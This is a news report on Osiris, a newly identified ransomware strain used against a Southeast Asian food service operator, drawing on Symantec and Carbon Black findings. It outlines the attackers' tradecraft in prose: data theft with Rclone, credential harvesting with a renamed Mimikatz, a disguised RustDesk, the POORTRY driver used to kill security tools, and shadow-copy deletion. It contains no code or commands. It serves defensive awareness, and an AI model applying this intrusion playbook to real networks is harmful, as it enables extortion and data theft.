Security researchers tracking a November 2025 ransomware attack in Southeast Asia say the emergence of a new strain, dubbed Osiris, underscores how modern ransomware operations increasingly blend familiar tools, recycled techniques and ambiguous affiliations, complicating efforts to assign responsibility.
A New Name in a Crowded Ransomware Landscape
In November 2025, a major food service franchise operator in Southeast Asia became the victim of a ransomware attack that initially appeared routine: systems were disrupted, files encrypted and a ransom note left behind. But closer forensic examination by researchers at Symantec and VMware Carbon Black revealed something less familiar — a previously undocumented ransomware strain now known as Osiris.
Osiris is described by researchers as a full-featured and technically mature ransomware, designed for use by experienced operators rather than novice criminals. It is capable of stopping services and processes, selectively encrypting files and folders, and deploying a customized ransom note. Encrypted files are appended with a “.Osiris” extension, while system safeguards such as Volume Shadow Copy Service snapshots are deliberately deleted to complicate recovery efforts.
Although the name Osiris echoes a ransomware family that circulated briefly in 2016 as a Locky variant, investigators emphasize there is no evidence of a technical or operational link between the two. The similarity, they say, appears limited to the name alone.
Certified Cyber Crime Investigator Course Launched by Centre for Police Technology
How the Attack Unfolded
The intrusion did not begin with encryption. According to the investigation, attackers spent several days inside the victim’s environment before deploying ransomware, quietly exfiltrating data using the legitimate file-sync utility Rclone. The stolen data was uploaded to a Wasabi cloud storage bucket, a tactic increasingly seen in so-called double-extortion attacks, where victims face both data encryption and the threat of public data leaks.
Only after this preparatory phase did the attackers launch the ransomware payload. Osiris supports a wide range of command-line options, allowing operators to define targets, logging behavior, encryption scope — either partial or full — and even how Hyper-V virtualized environments are handled. Encryption itself relies on a hybrid cryptographic approach, combining elliptic curve cryptography with AES-128 in CTR mode, using a unique key for each file.
The ransomware also employs asynchronous input/output techniques via Windows completion ports, a design choice that can improve performance during large-scale encryption operations. Victims are left with an “Osiris-MESSAGE.txt” file containing extortion instructions and negotiation links.
Familiar Tools, Unclear Attribution
While Osiris itself appears new, much of the surrounding activity looked familiar to analysts. The attackers relied heavily on common dual-use and post-exploitation tools long associated with advanced ransomware crews. Among them was a customized Mimikatz variant, renamed kaz.exe, used to harvest credentials — a technique frequently observed in past INC ransomware operations.
Network discovery and lateral movement were carried out using utilities such as Netscan, Netexec and MeshAgent. For remote access, the attackers deployed a modified version of the RustDesk remote monitoring and management tool, disguising it as “WinZip Remote Desktop” by altering its file description and icon to evade suspicion during casual inspection.
These overlaps have fueled speculation about possible links to the INC ransomware ecosystem, also known as Warble. Researchers caution, however, that tool reuse alone is insufficient to establish direct attribution, noting that shared utilities are often copied or repurposed across criminal groups.
Disabling Defenses Before Encryption
One of the most consequential steps in the attack involved the deliberate neutralization of endpoint security controls. Investigators found that the attackers deployed a malicious kernel-mode driver known as POORTRY, also referred to as Abyssworker. The driver was introduced through a bring-your-own-vulnerable-driver (BYOVD) technique, allowing the attackers to terminate security software by exploiting trusted but flawed drivers already present on the system.
The POORTRY driver was disguised as a legitimate Malwarebytes component, further reducing the likelihood of early detection. In parallel, the attackers used KillAV, a utility specifically designed to disable antivirus protections. Remote Desktop Protocol was then enabled to maintain persistent access before the ransomware was finally launched.
Little is known about who developed Osiris or whether it is being offered as part of a ransomware-as-a-service model. Symantec and Carbon Black researchers say the evidence points to either a former INC affiliate or actors closely imitating established INC tradecraft.
